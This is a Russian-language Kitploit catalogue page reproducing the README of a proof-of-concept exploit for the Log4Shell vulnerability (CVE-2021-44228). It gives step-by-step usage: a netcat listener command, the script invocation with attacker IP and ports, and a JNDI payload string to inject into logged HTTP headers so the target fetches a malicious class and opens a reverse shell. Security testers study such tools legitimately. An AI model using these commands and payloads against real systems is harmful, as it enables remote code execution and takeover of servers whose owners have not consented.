Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
log4j-shell-poc — Эксплойт-концепт (Proof-of-Concept) для уязвимости CVE-2021-44228. | Kitploit
Инструменты/GitHubGitHub/jiahong-guan/log4j-shell-poc
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubjiahong-guan/log4j-shell-poc

log4j-shell-poc

Эксплойт-концепт (Proof-of-Concept) для уязвимости CVE-2021-44228.

Репозиторий
110 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

log4shell-poc (CVE-2021-44228)

Эксплойт proof-of-concept для уязвимости Log4j (CVE-2021-44228), также известной как Log4Shell. Этот инструмент генерирует вредоносный Java-класс, запускает LDAP-сервер перенаправления и предоставляет полезную нагрузку по HTTP, позволяя удалённому атакующему выполнять произвольные команды на уязвимой цели.

Возможности

  • Автоматическое определение локального IPv4-адреса в качестве IP-адреса привязки по умолчанию.
  • Поддержка встроенного JDK 1.8.0_20 (рекомендуется) с откатом на системную Java.
  • Встроенная полезная нагрузка reverse shell (подключается обратно к слушателю netcat).
  • Чистая компиляция и очистка созданных файлов.

Требования

  • Python 3.6 или выше
  • Следующие файлы/каталоги должны находиться в той же папке, что и poc.py:
    • jdk1.8.0_20/ – копия Oracle JDK 1.8.0_20 (содержит bin/javac и bin/java). Если она отсутствует, скрипт попытается использовать системные команды javac и java.
    • target/marshalsec-0.0.3-SNAPSHOT-all.jar – JAR-файл marshalsec, используемый для запуска LDAP-сервера.

Установка

  1. Склонируйте или скачайте этот репозиторий.
  2. Поместите папку jdk1.8.0_20 и JAR-файл marshalsec, как описано выше.
  3. Установите зависимости Python:
    root@kitploit:~
    pip install -r requirements.txt
    

Использование

Запустите скрипт с помощью Python:

root@kitploit:~
python3 poc.py [OPTIONS]

Аргументы командной строки

Пример

  1. Запустите слушатель netcat на вашей атакующей машине (замените 9001 на выбранный вами порт):

    root@kitploit:~
    nc -lvnp 9001
    
  2. Запустите эксплойт:

    root@kitploit:~
    python3 poc.py --userip 192.168.1.10 --webport 8080 --lport 9001
    

    Если опустить --userip, скрипт автоматически использует основной IPv4-адрес вашей машины.

  3. Скрипт выведет строку полезной нагрузки для внедрения в уязвимую цель, например:

    root@kitploit:~
    ${jndi:ldap://192.168.1.10:1389/a}
    
  4. Внедрите эту строку в любое поле ввода или HTTP-заголовок, который заносится в журнал уязвимым экземпляром Log4j (например, User-Agent, X-Forwarded-For и т.д.). Цель подключится к LDAP-серверу, загрузит вредоносный класс с HTTP-сервера и выполнит reverse shell.

  5. В вашем слушателе netcat должно появиться shell-подключение.

Как это работает

  1. Скрипт генерирует Exploit.java, содержащий код, который открывает reverse shell на userip:lport.
  2. Он компилирует файл с помощью предоставленного JDK (или системного javac).
  3. Он запускает LDAP-сервер (через marshalsec), который отвечает на JNDI-запросы ссылкой на HTTP-сервер.
  4. Он запускает простой HTTP-сервер на webport для размещения скомпилированного Exploit.class.
  5. Когда уязвимая цель выполняет JNDI-запрос с внедрённой полезной нагрузкой, она загружает и выполняет класс, предоставляя атакующему reverse shell.

Важные замечания

  • Полезная нагрузка reverse shell использует /bin/sh и предназначена для Unix-подобных целевых систем. Для целей на Windows потребуется изменить команду внутри Exploit.java.
  • Рекомендуется использовать встроенный JDK 1.8.0_20, поскольку более поздние версии могут блокировать функцию удалённой загрузки классов JNDI, используемую этим эксплойтом.
  • Убедитесь, что межсетевые экраны разрешают входящие подключения на указанных портах (webport и lport), и что цель может связаться с вашей машиной.

Очистка

Скрипт автоматически удаляет Exploit.java и Exploit.class при завершении работы (как при обычном завершении, так и после KeyboardInterrupt). Если вам нужно сохранить файлы для отладки, закомментируйте блок finally в poc.py.

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование этого эксплойта против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим программным обеспечением.

Благодарности

  • Оригинальный PoC: kozmer
  • Marshalsec: mbechler
  • Уязвимость Log4j обнаружена командой Alibaba Cloud Security Team
Скачать инструмент
АргументТипПо умолчаниюОписание
--useripстрокаавтоопределяемый IPv4IP-адрес, к которому будут привязываться и который будут объявлять LDAP- и HTTP-серверы. Он должен быть доступен с целевой машины.
--webportцелое число8000Порт HTTP-сервера, обслуживающего скомпилированный Exploit.class.
--lportцелое число9001Порт, на котором ваш слушатель netcat ожидает reverse shell. Полезная нагрузка подключится обратно к userip:lport.